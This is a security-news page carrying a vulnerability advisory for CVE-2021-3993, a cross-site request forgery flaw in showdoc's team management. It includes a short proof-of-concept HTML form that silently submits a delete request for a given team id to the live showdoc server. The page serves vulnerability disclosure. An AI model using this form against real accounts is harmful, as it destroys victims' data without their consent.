Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-3993: Cross-Site Request Forgery (CSRF) in showdoc

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

CVE
#csrf#vulnerability

Description

You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don’t have strict flag.

Proof of Concept

1.replace 38046 with the team id

2.open poc.html and click on submit button.

3.after that the team with id 38046 or your replaced team id will be deleted.

//poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Occurences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907